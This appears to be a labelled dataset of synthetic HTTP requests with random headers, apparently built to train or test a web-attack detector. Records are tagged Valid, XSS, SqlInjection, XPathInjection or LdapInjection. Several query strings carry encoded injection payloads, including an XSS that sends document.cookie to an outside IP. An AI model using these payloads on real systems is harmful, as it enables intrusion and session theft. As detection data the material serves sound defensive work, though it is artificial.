GET /o6p/x0PI@P2OT/sxYeB93T/s7/iRVbSx4/c3oiise9bsmoTph/tIMrIuokv/wFOz/getdxMwfnebo69eri6/7GsEem8SGHoJ0Tk/mWIXB8@3lae.exe?sseenLfohr=tns&xoearme=gta%2Fhnati%2Fomdtg%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D24%5D++%7C++++RW%2Fwdr%2Fnlud%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D609%5D++++or++++%27ita%27%3D++%27&asnpss=n&G0K9wh=njiyheslTmsh5lhnxg&fN06=hUcNjuu7m&eEb2oder1faar=hqtfuo7etros6lo HTTP/1.1
Host: 13.194.75.246
Connection: keep-alive
Accept: text/*, image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rttee-oet, l5ArRmfo-S0fiee, esu-elb4pEe;q=0.6
Cache-Control: max-age=1105
Client-ip: 247.83.20.197
Cookie: ialhhecnt=Enietcm|erp~positionzz;ic=24;pouydioiZr=12214
Cookie2: $Version="1"
Date: Sat, 02 Oct 04 18:54:39 UTC
ETag: "H1R.iGgL4UA_bh.Cb"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Wed, 26 Aug 09 18:04:51 GMT
If-Unmodified-Since: Thu, 22 Sep 05 14:28:41 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Jan 07 15:44:42 CET
Max-Forwards: 146
MIME-Version: 6.6
Pragma: ibgsvkee=n
Proxy-Authorization: Digest nonce
Authorization: aglk hodc6t=qgoaeH
Range: 673-,-741678,577-
Referer: /urt1ew/i6nTC/tAbEsI/toAtd/ltWsahRt.mp3
TE: deflate,gzip,deflate
Trailer: TE
User-Agent: aEkUu-wf0 http://www.edee1i.be
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: 0.7 129.215.82.73
Transfer-Encoding: gzip
Upgrade: 7sfngt/9.6, ace6m/0.4, rraab8/8.8, ewau/0.8, 6eest/4.1
Warning: 272 www.ineutIx.jpg:5 "asndsepgt" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49250
Start - Id: 33690
class: Valid
PUT /a7JTj2/2l9yqq3TZBJ/rUx-w0PHT3cg@C8zTFQ/mitdbatstraacosaoo/dzTsYA@xJYXPzN8s/6zgroup byj/eSNThayfyywajeOD/goinputp/asvar.htm? HTTP/1.0
Content-Length: 137
Content-Language: 3iUoe,eohs
Content-Encoding: identity
Content-Location: http://mngm3.de/mOT1sDi/hlrhe/cslnB/qJ6gdI.pl
Content-MD5: NGxld0FyZXo4ZzhlZXRlMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 May 07 08:35:03 UTC
Last-Modified: Fri, 07 Dec 07 23:47:07 UTC
Host: www.y1mlr.net:80
Connection: close
Accept: audio/basic;q=0.7, application/rtf;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.3
Accept-Language: avMef8p-ynio, 2qnc6-scea, rto-l8eaEMe8;q=0.9, rants7ae-ombs
Cache-Control: max-age=6087
Client-ip: 188.178.199.117
Cookie: aetjow2tTryqb=5;anape=8555;kht1fe=7;CZ3@2ZAer1=iei graRtdhC;tiArewUa=vart
Cookie2: $Version="198"
Date: Thu, 12 Nov 09 18:49:48 CET
ETag: "3EAe9ccRuWKgUN4WX"
Expect: 100-continue
From: rvteetoa@hiit.it
If-Modified-Since: Fri, 14 Oct 05 17:52:32 GMT
If-Unmodified-Since: Sun, 21 Dec 08 22:16:03 GMT
If-Match: *
If-None-Match: "KVpUOiZQcRfvbj_ar"
If-Range: Sun, 11 Apr 10 01:50:57 UTC
Max-Forwards: 77
MIME-Version: 1.7
Pragma: oEvsite=1hoiniii
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: Digest realm
Range: 5-133497
Referer: http://www.llmq.fr/ledacsbg.bin
TE: chunked;q=0.3,trailers
Trailer: If-None-Match
User-Agent: anatotNaai/9.8.2.9.2
UA-CPU: PowerPC
UA-Disp: 2201,8379,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 603x625
Via: FTP/2.4 www.hamtegt.jpeg, 7.3 170.76.171.214, 1.6 www.mbae.js
Transfer-Encoding: identity
Upgrade: zssryR/6.5, ijnS/5.1, dEsf/4.2, Wss/3.6, Ktea/4.4
Warning: 255 20.208.58.243 "jso9tss" "Tue, 24 Oct 06 11:42:11 CET"
X-Forwarded-For: 134.44.228.236
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

I3EW1=y-8.&t8jbsxeM=00282&wCgbxrNGhtacces=eibeem)emlssuonull i&0Tvaosvpur=oh9scn&Anthgejy=\Jj&iayhTooI=dtautoexec&rewsans=a7cdwTYmND9

End - Id: 33690
Start - Id: 6595
class: Valid
POST /JXQNg_Tn/hVxzIjQ/nN9c4NLmoN1/pzMlLTunionsucopy/USfx_Zd.jpg? HTTP/1.0
Content-Length: 314
Content-Language: aSsos
Content-Encoding: gzip
Content-Location: http://o0esOl.it/poeaoioD/ensceInz.jpg
Content-MD5: M2l0Tm5jUjdzRTByZWV4cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Feb 10 23:59:52 CET
Last-Modified: Mon, 17 Dec 07 13:43:42 UTC
Host: www.elteet.uk:7953
Connection: close
Accept: application/rtf, image/jpeg;q=0.8
Accept-Charset: cp-936;q=0.6
Accept-Encoding: compress;q=0.8, gzip;q=0.6, identity, deflate;q=0.3, compress;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 54.15.143.98
Cookie: wfoleo=oomvlo;ksMcoBthaai=zhttp;null5c129AG= 3igEgcebinsus\<
Cookie2: $Version="9"
Date: Sun, 13 Nov 05 04:47:18 GMT
ETag: W/"iYRjIpkQ8Lu5xJDm"
Expect: e6E8o
From: ci0kco@eB9dr5ut.be
If-Modified-Since: Mon, 01 Nov 04 19:10:17 CET
If-Unmodified-Since: Wed, 26 Sep 07 19:39:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Aug 08 06:50:45 CET
Max-Forwards: 79
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=auth
Range: 4-127599,-940544
Referer: http://www.oeos.biz/Bttupest/xwtrn8hr/1pegSt.js
TE: deflate,chunked,trailers
Trailer: Warning
User-Agent: cakoSayod/9.0.5.5.0
UA-CPU: PowerPC
UA-Disp: 0239,483,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2928x871
Via: 1.3 www.rewifTts.png
Transfer-Encoding: recurg
Upgrade: o5nsev/4.7, tnlt/7.7, zdoi/3.6, iecrA/4.6
Warning: 863 22.42.57.182 "D6ga" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 6276984626
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aasw7enpokTlhe0=tit12~naiccHie&hrroaE0e=usrL&hs=i8inDnnqobtneeaAoIam&eqavg=uperl-sphel&wOa=0hLF8So.3&tbr6ronreo=73449&ZKcFrcpc=rrnlsnNkca1lsd&efrst2o=266110&lqabtnoxnr1hYa=03057427&tenfljtd4mnu=3i-&geiae4=~eo ]inSe&NtLoAelgi=9899&shld3kpehsdlDy=63&dohhaCnsbe7NoE=1owherets?oexechR&gdueo0eqdtoudet=5gtnrecee

End - Id: 6595
Start - Id: 49571
class: XPathInjection
GET /bgT6EQzjoU587/ohqThdsuOtsQ7/ssqrgaqR3tul/CIuse/suNrsLTdsFn/0%upp51bgsound/vWvxWeIHdtpfIzu/mj/yOnKfoUO2-@Rjb/cZrGpp6rlQM0haQG@Cl/IqPphpEUhtaccestbgsoundWMiframeRhavingH/rsth.shtml?CWOJAT3@49o=rLe-+&eern=yonstenynzrtatmt&sTyHeo2=ae%3FiTe0s6homx&ea7oou9r=23726652&ahHAtpssahhpan=7391&ny4ribhe0=yaBSfromiframeStdwmr&qsyaanut=mbyx&he=587585&an9c4eeaSeftohl=jdd%27++++or+++ro%2F0ata3%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D32%5D+or++%27onuEedee%27++++%3D+%27&Wsgu3DpKA=501&aet9=zljZ8v.DdfD5&S8=ewenheosidos&tdehtIz=c HTTP/1.0
Host: 112.70.214.247
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0, windows-1252;q=0.5, x-mac-icelandic;q=0.9, utf-7
Accept-Encoding: 
Accept-Language: n-tf;q=0.2
Cache-Control: no-cache
Client-ip: 27.25.46.254
Cookie: T_ZVV7e52Y=rwrgheowlsa9tt
Cookie2: $Version="6"
Date: Wed, 16 Feb 05 21:27:18 CET
ETag: "BEeu9oNIpOCkdaWPzyls"
Expect: rai8lT=iouvqGee;fouiTcye=n37l
From: i5aux@ablaftejic.be
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Fri, 27 Oct 06 07:16:09 UTC
If-Match: "lMf3_lfv-awJc@89w@"
If-None-Match: "fX7hxhiFrWQFTeJ58"
If-Range: Fri, 29 Dec 06 16:38:20 UTC
Max-Forwards: 9
MIME-Version: 1.5
Pragma: i=uE
Proxy-Authorization: eeftuo sfagt=srres
Authorization: Digest realm
Range: -351866,-996363,00-
Referer: http://www.vglxd.ch/ymoni/o4i1if/qfid/srdb/vrur.jpeg
TE: trailers
Trailer: Range
User-Agent: ltetrbxpm (r_RLjKFr)
UA-CPU: StrongARM
UA-Disp: 979,7479,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: eso/3.0 154.226.69.16, HTTP/8.8 www.ypltEa.jpeg
Transfer-Encoding: identity
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 61.92.55.45
X-Serial-Number: 4750592519886658439
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49571
Start - Id: 25125
class: Valid
GET /n80nurzHCg9b.cgi?DYze=frb%40kYcTH&utelN=ltee&sjio=259&htiamEes5rnc=06&oiku=mahmae-shaaor&ontcmuo=4170365&iqraeintfo=qnulljmrfciuelI&dtxqdxi=aeguss99Tet5&0aYWscript=bd%2Fee%2B0%5B&QmsTstdinOF=445&h_cdhQ-it=971584633&lwwat=nr HTTP/1.0
Host: 62.182.151.72
Connection: close
Accept: application/zip;q=0.3, audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate, compress, identity, identity
Accept-Language: n-eun7ek;q=0.3
Cache-Control: no-store
Client-ip: 67.105.118.24
Cookie: eeaelo=75601400;S5wshpe14aRrmI=27792723
Cookie2: $Version="0"
Date: Mon, 22 Jan 07 21:09:03 GMT
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: njdg9e=8lmr8hn
From: hdmeewo@EiLnsiO.uk
If-Modified-Since: Mon, 16 Oct 06 14:31:11 GMT
If-Unmodified-Since: Wed, 23 Jun 04 23:57:39 UTC
If-Match: "a.Px5sQsQdqSzAik6Sgi"
If-None-Match: "n9gxNWbVTWXl6kTBD6I"
If-Range: *
Max-Forwards: 28
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Basic dW1pdDplbGR6dGFzYg==
Range: 418-75506
Referer: http://1mhsaisn.cz/ae0re/yttnlp9.sh
TE: chunked,trailers,trailers
Trailer: Accept-Encoding
User-Agent: enjoo/6.0
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5457x802
Via: 2.1 148.106.23.42, HTTP/1.6 38.92.167.248
Transfer-Encoding: gzip
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 856 www.otgia.css "oabfnoRfoehnueGi" "Tue, 04 May 10 20:01:11 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 29602891533247777
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25125
Start - Id: 47823
class: XSS
GET /athQomannlahhd.png?Urgtjtnvekro=64rejw&oendoFfrat=%3Cobject+++classid%3D++++%22+++++clsid%3A...++++%22+codebase+%3D++++%22+++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F0.81.28.228%2Fll.nsf%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&Leked=+&5si6dAtaefa=kb8rczmoitn&eElcwselaEtejsg=aogrjt9i+&9r=e%3DpRe&haeapi=oeOuesrn0asDfod&ItmpwSLKTk=h6e%28 HTTP/1.0
Host: www.waihnEyeor.uk
Connection: dmdenke
Accept: image/jpeg;q=0.1, text/*;q=0.2
Accept-Charset: windows-1258, cp-936, x-mac-turkish;q=0.2, cp-932, windows-874
Accept-Encoding: *;q=0.9
Accept-Language: Ge-Qajes, Attgs-aSnahmI
Cache-Control: no-store
Client-ip: 106.65.144.196
Cookie: 2nra5yennme=a
Cookie2: $Version="3"
Date: Mon, 13 Sep 04 23:55:19 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: nets3L
From: esal@nqcagsropr.fr
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Fri, 21 Nov 08 09:17:49 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: *
Max-Forwards: 5263
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: NTLM YWJvYXBzbmNuZWhrbHNlT05taHR0dHRJYWlpbktpdGlnZG1t
Range: 2820-37,-5180,81-
Referer: /csim/thiseipe/rTDop2g3/nf2c.html
TE: trailers,deflate;q=0.4,trailers
Trailer: TE
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 0.5; gr-da; rv:0.0.6) Gecko/60901358
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: 2.5 www.rdSU.tiff, 5.0 www.htgoeawA.tiff, 0.4 www.atnmccca.png
Transfer-Encoding: identity
Upgrade: tt5hfe/7.3
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 4290166735414174
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47823
Start - Id: 29886
class: Valid
GET /Oprocessing-instructionhLmsSDhttposelect/a4PXw_L6LQcSzRnYo9/etcjm3pD3801E1/wfnlmddeitetT/Fscript0y7window.openmbT/rf3lBPGsLlc1dc/ioOh5dui5ear3hei2/omoeesdqs5b.asmx?chec3itenoepo8n=shfy&aiA=0stAMjD2q&i4rt1Nr2ocexte=679074&Cp9HrU=+hei%24wt8eunph-y%2Fsrmvts&pxSShJE=tvs&NHyncZyqsock_stream@=%40s%7Cg&7I8NidTUO=4a2n&0oyTzdaIeth=4054005432&mXqAT8K8eval=yornrrmraO&ir=5scriptTlocation&selectbX@ky=603857&TIYyboadseeeft=iv9&dAGlYJPNa=ogt HTTP/1.0
Host: 172.138.230.28
Connection: udMe
Accept: */*;q=0.9
Accept-Charset: big5
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: 3on6O=ee
Client-ip: 214.124.111.84
Cookie: tlh=t;2xTO7LfypsPr=iea0s;6nourcA=fromssn;bnun=58
Cookie2: $Version="8"
Date: Sat, 31 Jan 09 21:04:58 CET
ETag: W/"TfIOlc_t7kmM9j_MpD-"
Expect: AbexcEll=Tbddt
From: oge1@piabtEr.uk
If-Modified-Since: Sun, 30 Oct 05 21:29:52 UTC
If-Unmodified-Since: Tue, 09 May 06 22:59:32 UTC
If-Match: "1zxJaNfmFwiXmnnVI"
If-None-Match: "q6_4Jlwq@USkMEQ"
If-Range: Sun, 19 Feb 06 01:04:14 CET
Max-Forwards: 232
MIME-Version: 9.7
Pragma: Islrc='alnalmeT'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic aWVlc0wzaHI6YWV1Y2x0NXA=
Range: 71-
Referer: http://aecBha.net/seWsofl/ateleit/wSiocSr/Ktnqru/9IuMeotv.tiff
TE: chunked;q=0.0,deflate;q=0.1,deflate;q=0.1
Trailer: Expect
User-Agent: Mozilla/8.6 (X11; U; SunOS sun4u 4.9; 4i-Ou; rv:3.7.8) Gecko/92868055
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 787x2040
Via: 9.3 www.nwaast.htm, FTP/2.3 90.227.197.11, HTTP/5.8 www.Ii4e.shtml
Transfer-Encoding: compress
Upgrade: rens/6.9
Warning: 213 www.chsq.js "nlm16isgerEe" "Sat, 10 Oct 09 10:33:19 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29886
Start - Id: 41921
class: SqlInjection
GET /g9h2.knC3tvyt/jR29rI.YywMqSA3/h1/ceqgtm/.C0_ImKDhtaccesK/lKbs/een.jsp?Iex=20302925&sknAi62euNr9Lf=kouyVqfrolM8s6n&ltbNwana=y%40%7Ck5%403s&PMdBr6rservicesA=02621&rtrogsjsmislee=658&86=zeqj28&oui2tiIsaseemu=bsm0&0etsoe0ztanpee=nfa&tn=sOjbGFmz&lnlr=%27+AND++++USER_NAME%28%29%3D%27rf&cul=b%40ketNp HTTP/1.1
Host: www.Ueykusz.fr:55252
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=8
Client-ip: 21.123.50.241
Cookie: M8OyMdtTW=Tca1&
Cookie2: $Version="615"
Date: Wed, 03 Dec 08 20:10:00 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: usDda@iceeiIo.gov
If-Modified-Since: Wed, 29 Jun 05 15:15:10 GMT
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.6
Pragma: crrl='entsn5t'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -0
Referer: /pwomheot/Bjfcato.aspx
TE: chunked;q=0.2,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: eiAenrr/6.1.4.1.3
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: 9.3 www.ibefT.tiff
Transfer-Encoding: compress
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41921
Start - Id: 38111
class: LdapInjection
GET /qD/nvXct/wl-C3ZX_lYz@6unZI/TgJin2VFf/gCdY.shtml?2su5lpiRaaen7=2dnnu&ut4xtysei=occaann&einaRJtnt7hsse=ao&cqetecae=reseCnvgl&uewgSzthS2pee=356302&moaaeEt4raep7E=54996&rsQLln=%29+%28+%7C++%28+++cn%3D*o%27brien*++++%29%28mail++%3D*o+%27brien*+%29++++ HTTP/1.1
Host: www.keot.net:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 223.239.75.68
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="847"
Date: Wed, 28 Apr 10 15:05:56 UTC
ETag: "zMdP6E8XjQnsW2OMI"
Expect: 100-continue
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Sat, 17 Apr 04 10:21:08 CET
If-Unmodified-Since: Mon, 11 Jan 10 24:37:18 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 915
MIME-Version: 2.3
Pragma: 7dasnanj='odiat'
Proxy-Authorization: Digest username="xisr3"
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: /eldal/duszlte/dqsVitd/rNif.jsp
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.4 (compatible; Konqueror/1.9; Open BSD i586; nfrImaeh; tnat; Aicux)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 8.6 www.nia2mr.gif, iws1O/3.3 www.9lr6more.tiff
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38111
Start - Id: 12070
class: Valid
GET /window.openMBqou-iLqbzvU.dll?bpirc=167191&Orce=d9Th&uleetefReyywn=3118&ytsMPembnao7s=6527411&0epqd4B7qmtrI=67454131 HTTP/1.1
Host: www.lnis.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-4, cp-936, big5;q=0.4, x-mac-greek, cp-932;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: 1='rihoe1e'
Client-ip: 95.52.67.108
Cookie: 0aPxUNG5group byM=iFSa;edwznt=eCLKEC
Cookie2: $Version="7"
Date: Mon, 13 Dec 04 01:46:13 CET
ETag: "TD5trH1JHig-axgCFnTv"
Expect: 100-continue
From: etve6nr2@hnieae.cz
If-Modified-Since: Wed, 09 Jul 08 23:45:08 UTC
If-Unmodified-Since: Fri, 03 Sep 04 08:34:50 GMT
If-Match: *
If-None-Match: "m_MyeTfV_DUiKnNO2yB"
If-Range: *
Max-Forwards: 00
MIME-Version: 3.1
Pragma: yrn='e'
Proxy-Authorization: NTLM ZUVrZWl0Zm9jaWRhdG5lU3JFaU81ZDFtN2RlRW5vZ29zYzM=
Authorization: NTLM OWhzOHNlMGx0bjlhcnVhblR0aXR3dnBpdFRBd29zdEVucmlsbmZzeQ==
Range: -2
Referer: /toahd.jpg
TE: chunked,trailers
Trailer: If-None-Match
User-Agent: 9JHDdLYVv http://www.youeasi.st
UA-CPU: MIPS
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 2.4 13.86.12.180, 1nf3Hh/5.1 204.35.107.63, 7.7 158.118.51.166:97670
Transfer-Encoding: deflate
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 813 226.224.5.12 "nenDbioeTeurpj" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 987751
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12070
Start - Id: 26024
class: Valid
GET /oUpHACTqb@zI9W4I1o/Pi/8T1/ahid1M44K-PR4D3/Uo/-@YF8YE.0.php4?7xToS@qW=7028445&uosiwteriom=%7Ewddocumentrpfs%3Ba&uuOedikneic=djgenhtaccesemncati%5D%7E%29eanru8&tinbao9edbsr2e8=c%29aa&oortahEared=qin&awrr=htpasszt&ysEnht=3576932&vlc0ihsaceoiat7=eeoC5v%40%40zJBR&g5urhs=passthruhqe%5C&gehwId=4aocbadriur3esawe5&psr5dademeo=d%2Bhjo&llnaaaOihe2eneV=sZQd&NORmT=39389&rble1esc9r5rc6=l HTTP/1.1
Host: 32.50.212.151
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, iso-8859-4, euc-tw;q=0.1, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: e7qsmi-hetcgI;q=0.0, aheg-Crg, s2pne6ei-jecin
Cache-Control: min-fresh=7
Client-ip: 157.41.225.239
Cookie: ea=1@5-oQYzCN;gtdi=1wneOtmt5t6bey;onfnn=609379;ndjptoUzDeusqQ=~d0http0;I8itdzseda=271854
Cookie2: $Version="7"
Date: Tue, 15 May 07 22:46:49 GMT
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: nchut@r3st.it
If-Modified-Since: Sun, 01 Oct 06 04:05:21 UTC
If-Unmodified-Since: Mon, 18 Jun 07 17:07:31 GMT
If-Match: "h4mZTw803c3yNdGe76xu"
If-None-Match: *
If-Range: "@nC6B7KNQ8nDUkaxP"
Max-Forwards: 91
MIME-Version: 7.9
Pragma: eNdt='e'
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: NTLM ZWlhdnNMaXIxbXBFYlRjaGllZWZlZXNSOGVFSmh1V293b3lrb2FjZWY=
Range: -13,874-810484,763-09710
Referer: /naOo/6ohnlhl/9ecumen/i1wdj/spvnYkoh.wmn
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (X11; U; Linux i586 0.6; Cu-cg; rv:3.3.4) Gecko/73821760
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7399x6739
Via: FTP/2.9 www.thvu.jpeg, 2.7 www.umh4Tmd.tiff, 6.6 www.csntLnvo.shtml:55810
Transfer-Encoding: deflate
Upgrade: yuk/5.7, RisS/8.9
Warning: 578 216.112.216.157 "mtdt" "Thu, 22 Apr 10 15:51:14 GMT"
X-Forwarded-For: 146.141.9.10
X-Serial-Number: 6743288486222977
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26024
Start - Id: 47846
class: XSS
GET /6Pv.u6WpjFN.asmx?tyt7metDk0nd3Go=IpPtsd8qnn&wYnaee6qtwbcToi=nlEiT84&ev=d5eformdwshutdown&erironsapfao=%3Cimg+++src+%3D+%22livescript%3A%5Balert++++%28%27ti7i%27%29%3B%5D++%22++%3E&H3Uvbscript@HdL@htpass=eeyopttmpr&EsZovc=eee&Rh-O12group byr15Jx=%3Ft72yi%3EEm%29eafe%2B&tkRaoIjah=901&se4rdaie9psmftH=2nigponsae&MQ5JyOk1A6D=d%404u%40 HTTP/1.1
Host: 133.125.3.227
Connection: ietq7
Accept: image/gif;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ntberr-it8x4;q=0.4
Cache-Control: max-stale
Client-ip: 106.34.137.82
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Sat, 26 Feb 05 02:55:42 GMT
ETag: "c4Wi6no_@51d.A@3Mpf"
Expect: 100-continue
From: rntaoh@dim7.fr
If-Modified-Since: Fri, 15 Aug 08 11:35:41 CET
If-Unmodified-Since: Mon, 29 Aug 05 15:53:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: Digest nc=eDCeb778
Range: 87782-,-880675
Referer: /ene6a/4acResoi.txt
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 1.0; iz-oe; rv:7.1.2) Gecko/54289686
UA-Disp: 4309,162,32
Via: tmfsf/7.6 www.Onitn.tiff
Transfer-Encoding: compress
Upgrade: Xtfkh/8.2, Oni/6.3, dia/4.0, rase/7.9
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47846
Start - Id: 37073
class: LdapInjection
GET /tepts/JyQautoexecvg4lu/h9hzTtegzsepaatwat9o/eJwlFzexyPMhEXa/oM@P/cuZ-Nkk3BSYbrTBoj/aCTwI/tyQNXywao2/yIHmLHHeK-jJf.png?lozanelnunere3u=e0dieia2kcen&cdmtot9hnaFmuR=747&cD4xZwheres=+kt&ESstylewinntRadmin=%29++%28%7C+++%28cn%3D*o++%27brien*++%29%28mail++++%3D*o+++%27brien*++%29++++&trtx7ideEmxiriz=64 HTTP/1.1
Host: 23.40.0.33:7
Connection: hnote
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.225.76.42
Cookie: leesi4i3=3
Cookie2: $Version="67"
Date: Fri, 28 Aug 09 05:24:46 CET
ETag: W/".eEQ4Wr5D0sN1fBRU"
Expect: 100-continue
From: eyLj@5eswrLbN.net
If-Modified-Since: Tue, 11 Mar 08 06:35:45 UTC
If-Unmodified-Since: Mon, 22 Mar 04 05:04:41 GMT
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Fri, 20 Nov 09 18:41:43 CET
Max-Forwards: 18
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM NnRhbmhlc2loaHQwbGhobFp3c2N0YW90YW5rcnRFWmFpc2lo
Authorization: wa3fa0 aiaNjca=yhetw5Y
Range: -61152
Referer: http://www.Geex.ch/ds2r6.fgf
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: Upgrade
